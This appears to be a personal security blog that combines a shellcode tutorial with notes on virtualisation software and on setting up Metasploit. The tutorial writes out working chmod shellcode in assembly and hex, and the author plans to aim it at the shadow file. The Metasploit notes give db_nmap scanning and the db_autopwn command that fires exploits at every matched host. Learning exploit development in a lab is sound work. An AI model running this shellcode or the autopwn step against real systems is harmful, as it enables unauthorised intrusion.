Creating shell code on Ubuntu 10.04 using the chmod system call Part 1

I have decided to document some basic introductory information concerning creating NASM and C code on my Ubuntu build.-

This is just my documentation space on how to create shell code on a linux machine. The syscall that I have chosen for this project is chmod and "testfile" at its target.

This particular example will change the permission of the "testfile" to 777 in the same directory.

Part 2 of this exercise will probably change the permission on the shadow file using a vulnerable program. This should not be to difficult since I already have the asm code and just need to specify a file path and choose my vulnerable program.

Step 1 -

Ensure that you have nasm and g++ on your ubuntu build

$sudo apt-get install nasm

Step 2

Create an assembly program call ch_test.asm

$ touch ch_test.asm

$ gedit ch_test.asm

;ch_tests.asm                  ; File name of assembly program

[section .text]          

global _start            

_start:                             ; Initiate my global start and jump command

jmp short ender              ; Jump to the ender place holder in code

starter:                           ; return from previous jump this helped store file location

xor ecx,ecx                     ; clear memory (zeroize)

xor ebx,ebx

xor eax,eax

pop ebx              ; I popped this to ensure we 

mov al, 15        ; reduce Null by using 8-bit this is chmod system call

mov ecx, 511       ; This is the octal rep for 777 on Linux

int 80h                 ; Execute

xor ebx, ebx        ; Clear memory for ebx

mov eax, 1          ; Syscall for exit

int 80h                ; Execute

ender:                                 ;ender instruction location of my file

call starter                        

db 'testfile'                          ;test file name in the same directory

Step 3- test my nasm code.

$ nasm -f elf ch_test.asm #This will create an ch_test.o file

$ ld -o ch_test ch_test.o

$ strace ./ch_test

 execve("./ch_test", ["./ch_test"], [/* 37 vars */]) = 0
chmod("testfile", 0777)                 = 0
_exit(0)                                = ?

$ objdump -d ch_test # The following output will be displayed,

ch_test:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:    eb 19                    jmp    804807b

08048062 :
 8048062:    31 c9                    xor    %ecx,%ecx
 8048064:    31 db                    xor    %ebx,%ebx
 8048066:    31 c0                    xor    %eax,%eax
 8048068:    5b                       pop    %ebx
 8048069:    b0 0f                    mov    $0xf,%al
 804806b:    b9 ff 01 00 00           mov    $0x1ff,%ecx
 8048070:    cd 80                    int    $0x80
 8048072:    31 db                    xor    %ebx,%ebx
 8048074:    b8 01 00 00 00           mov    $0x1,%eax
 8048079:    cd 80                    int    $0x80

0804807b :
 804807b:    e8 e2 ff ff ff           call   8048062
 8048080:    74 65                    je     80480e7
 8048082:    73 74                    jae    80480f8
 8048084:    66                       data16
 8048085:    69                       .byte 0x69
 8048086:    6c                       insb   (%dx),%es:(%edi)
 8048087:    65                       gs

Step 4- use the created nasm objdump information.

$ touch ch_test.c

$ gedit ch_test.c

# This values are obtained from the objdump form the asm .

const char code[]= "\xeb\x19\x31\xc9\x31\xdb\x31\xc0\x5b\xb0\x0f\xb9\xff\x01\x00\x00\xcd\x80\x31\xdb\xb8\x01\x00\x00\x00\xcd\x80\xe8\xe2\xff\xff\xff\x74\x65\x73\x74\x66\x69\x6c\x65";

int main(int argc, char **argv)

{

int (*func)();

func = (int (*)()) code;

(int)(*func)();

}

Then you want to compile the c program to make it executable.

$ g++ -g ch_test.c -o ch_test

Execute the program

$ strace ./ch_test


Perform some gdb on the binary to see the memory information.

$ gdb -q ./ch_test

(gdb) list

1

2 const char code[]= "\xeb\x19\x31\xc9\x31\xdb\x31\xc0\x5b\xb0\x0f\xb9\xff\x01\x00\x00\xcd\x80\x31\xdb\xb8\x01\x00\x00\x00\xcd\x80\xe8\xe2\xff\xff\xff\x74\x65\x73\x74\x66\x69\x6c\x65";

3

4

5 int main(int argc, char **argv)

6 {

7 int (*func)();

8 func = (int (*)()) code;

9 (int)(*func)();

10 }

(gdb) disas main

Dump of assembler code for function main:

0x08048494 <+0>: push %ebp

0x08048495 <+1>: mov %esp,%ebp

0x08048497 <+3>: and $0xfffffff0,%esp

0x0804849a <+6>: sub $0x10,%esp

0x0804849d <+9>: movl $0x80485a0,0xc(%esp)

0x080484a5 <+17>: mov 0xc(%esp),%eax

0x080484a9 <+21>: call *%eax

0x080484ab <+23>: mov $0x0,%eax

0x080484b0 <+28>: leave

0x080484b1 <+29>: ret

End of assembler dump.

(gdb) break main

Breakpoint 1 at 0x804849d: file ch_test.c, line 8..

(gdb) run

Starting program: /home/t/coding/t_coding/ch_test

Breakpoint 1, main (argc=1, argv=0xbffff4f4) at ch_test.c:8

8 func = (int (*)()) code;

(gdb) info registers

eax (Accumulator) 0xbffff4f4 -1073744652

ecx (Counter) 0x758d8dac 1972211116

edx (Data) 0x1 1

ebx (Base Register) 0x283ff4 2637812

esp (Stack Pointer) 0xbffff430 0xbffff430

ebp (Base Pointer) 0xbffff448 0xbffff448

esi (Source Index) 0x0 0

edi (Destination Index) 0x0 0

eip (Current Instruction) 0x80483bd 0x80483bd

eflags 0x286 [ PF SF IF ]

cs 0x73 115

ss 0x7b 123

ds 0x7b 123

es 0x7b 123

fs 0x0 0

gs 0x33 51

(gdb) info registers eip or below

eip 0x804849d 0x804849d

(gdb) i r eip

eip 0x804849d 0x804849d

(gdb) x/o $eip # show in octal

0x80483bd : 01411042307

(gdb) x/x # show in hexadecimal

0x80483c1 : 0x08048490

(gdb) x/8xb # show the memory in 8 hexadecimal bytes

0x80483c5 : 0x8b 0x44 0x24 0x0c 0xff 0xd0 0xc9 0xc38

(gdb) x/8xh # half word 2bytes or x/8xw #word 4bytes or x/8xg 8bytes

0x80483cd: 0x9090 0x5590 0xe589 0xc35d 0x748d 0x0026 0xbc8d 0x0027

Notes about – dump and gdb

The first three lines have to do with stack preperation -

The lines that need to be analyzed are movl and mov -

info registers – displays the contents of integer registers -

Help info will give you some additional commands in gdb

EAX, EBX, ECX, and EDX 32 Bit

AH, BH, CH and DH 16 Bit


AL, BL, CL, and DL 8 Bit

VMware or VirtualBox on Ubuntu 10.04 - installation and conversion

It seems like whenever I perform an upgrade as an example from 9.10 to 10.04, the VMware build seems to lose it functionality. This has caused me to utilize VirtualBox some months ago and the first key item that I noticed was the ease of installation.





INSTALLING VirtualBox on Ubuntu 

So simple,

They fully support debian and more particularity Ubuntu 10.04 ("Lucid Lynx") with a *.deb download -

http://www.virtualbox.org/wiki/Linux_Downloads

So you basically just click on the link and use the package manger to run the GDebi package installer -

I did not take any notes when I installed the app but remember it was very simple and I did not have to load any additional libraries - but since I did not take notes you might have to load some dependencies -  sorry I just don't remember.


INSTALLING VMware on Ubuntu 

This section is a pain - As far as I know and based on some searching there is not a supported versions specifically built for ubuntu 10.04 so you have to download the VMware-Player*.bundle file manually to install the application.

These day - were Time is so so premium and if it takes more time that it should to perform a function or use a specific environment, then I turn to other tested solutions.


This was my quick experience trying to install VMware on Ubuntu -

I found some documentation were you download the VMware-Player*.bundle from the website after you register.

Then you change the permission's to +x  and try and run the bundle.
$ chmod +x VMware-Player*.bundle chmod +x VMware-Player*.bundle
$ gksudo bash ./VMware-Player*.bundle

This resulted in a whole bunch of errors and yes I have g++ installed  -

so I tried

$ sudo ./VMware-Player-3.0.0-203739.i386.bundle  --ignore-errors

Then I received this message -

./VMware-Player-3.0.0-203739.i386.bundle: 110: Syntax error: newline unexpected

As stated before I am at a turning point in my life were I used to spend the hours trying to troubleshoot this error message. So if I am aware of a comparable product that can produce the same results that has me up and running in minutes compared to an hour of trouble shooting then I am sold.

So I gave up on VMware on the Ubuntu platform and I have been currently using VirtualBox and will continue to do so,

I can say in VMware defense that at my current workplace were I am forced to use Windows in some areas, the VMWare Workstation and Server products are great.




This is my way of letting of some steam and as a quick reference for a later date so I can remind myself why I am using VirtualBox -

Installation of Metasploit Framework on Ubuntu Linux

I have a new ubuntu build (10.04), and I am installing all of my usual software and of course I have to re-install metasploit for my internal security lab testing purposes.

I am referencing the below link for the installation and this blog as my personal documentation space so I do not have to re-invent the wheel on all future installations.

So far the documentation has been sound with no hiccups - I am currently installing the tarball and will perform some testing.

I also plan on writing some ruby code and document the process.

Basic Metasploit Setup on UBUNTU -
http://www.metasploit.com/redmine/projects/framework/wiki/Install_Ubuntu

The database that I have selected in this installation is -

$ sudo apt-get install rubygems libmysqlclient-dev
$ sudo gem install mysql

I have some experience with MySQL and I image that I will utilize the db in future programming projects on this server.

Also ensure that you have mysql-server installed


$ apt-get install mysql-server 

--------------------------- MySQL user setup -------------------------
Since this was a new ubuntu build - I did have to install MySQL and created a user for metasploit -


mysql>create user 'useraname'@'localhost' identified by 'password';

mysql>GRANT SELECT,INSERT,UPDATE,DELETE ON *.* TO 'userame'@'localhost';

mysql>GRANT ALL ON *.* TO 'username'@'localhost';


-----------------------------------------------------------------------------


All sections of the installation have been completed except the "To enable WiFi modules:"

Now the fun begins starting Metasploit and testing the functionality.

In this install the correct full path to start is -

Start Metasploit



$ /opt/metasploit3/msf3/msfconsole

Basic Metasploit commands to get started



1.Ensure that you can connect to your preferred database which in my case is MySQL -


msf > db_connect username:password@locahost/metasploit3


#Note this will create a metasploit db in your mysql-server on localhost -


2. Metasploit does have a ? help command and will allow you to choose from the  core commands and Database Backend Command - 

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    help          Help menu
    info          Displays information about one or more module
    irb           Drop into irb scripting mode
    jobs          Displays and manages jobs
    kill          kill a job
    load          Load a framework plugin
    loadpath      Searches for and loads modules from a path
    quit          Exit the console
    resource      Run the commands stored in a file
    route         Route traffic through a session
    save          Saves the active datastores
    search        Searches module names and descriptions
    sessions      Dump session listings and display information about sessions
    set           Sets a variable to a value
    setg          Sets a global variable to a value
    show          Displays modules of a given type, or all modules
    sleep         Do nothing for the specified number of seconds
    unload        Unload a framework plugin
    unset         Unsets one or more variables
    unsetg        Unsets one or more global variables
    use           Selects a module by name
    version       Show the framework and console library version numbers


Database Backend Commands
=========================

    Command               Description
    -------               -----------
    db_add_host           Add one or more hosts to the database
    db_add_note           Add a note to host
    db_add_port           Add a port to host
    db_autopwn            Automatically exploit everything
    db_connect            Connect to an existing database
    db_create             Create a brand new database
    db_del_host           Delete one or more hosts from the database
    db_del_port           Delete one port from the database
    db_destroy            Drop an existing database
    db_disconnect         Disconnect from the current database instance
    db_driver             Specify a database driver
    db_hosts              List all hosts in the database
    db_import             Import a scan result file (filetype will be auto-detected)
    db_import_amap_log    Import a THC-Amap scan results file (-o )
    db_import_amap_mlog   Import a THC-Amap scan results file (-o -m)
    db_import_ip_list     Import a list of line seperated IPs
    db_import_msfe_xml    Import a Metasploit Express report (XML)
    db_import_nessus_nbe  Import a Nessus scan result file (NBE)
    db_import_nessus_xml  Import a Nessus scan result file (NESSUS)
    db_import_nmap_xml    Import a Nmap scan results file (-oX)
    db_import_qualys_xml  Import a Qualys scan results file (XML)
    db_nmap               Executes nmap and records the output automatically
    db_notes              List all notes in the database
    db_services           List all services in the database
    db_status             Show the current database status
    db_sync               Synchronize the database
    db_vulns              List all vulnerabilities in the database
    db_workspace          Switch between database workspaces

3. The db_autopwn is the easiest to use and will show you the options that are associated with this command at the command prompt -

Usage: db_autopwn [options]
    -h          Display this help text
    -t          Show all matching exploit modules
    -x          Select modules based on vulnerability references
    -p          Select modules based on open ports
    -e          Launch exploits against all matched targets
    -r          Use a reverse conndbect shell
    -b          Use a bind shell on a random port (default)
    -q          Disable exploit module output
    -R  [rank]  Only run modules with a minimal rank
    -I  [range] Only exploit hosts inside this range
    -X  [range] Always exclude hosts inside this range
    -PI [range] Only exploit hosts with these ports open
    -PX [range] Always exclude hosts with these ports open
    -m  [regex] Only run modules whose name matches the regex
    -T  [secs]  Maximum runtime for any exploit in seconds



4. I added a single host to test the functionality of this build -

msf > db_add_host xxx.xxx.xxx.xxx

msf > db_hosts # This will ensure you are using the correct hosts in the databases.


5. You can also use nmap to search out hosts and port - # on this build I had to install nmap


------------------------- Install Nmap on Ubuntu------------------------------

$ sudo apt-get install nmap 



-------------------------- Install Nmap on Ubuntu------------------------------


msf > db_nmap -sS -T4 -O x.x.x.0/24
or db_nmap -sS -T4 -O X.X.X.X

NMAP switches -
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-T<0-5>: Set timing template (higher is faster)
OS DETECTION:
  -O: Enable OS detection


6. Once you build your database of known hosts and ports you can then choose the lazy way 

msf > db_autopwn -t -p -e -s -b   # See step three for switch defs.

Dirk Loss: Python tools for penetration testers

Dirk Loss: Python tools for penetration testers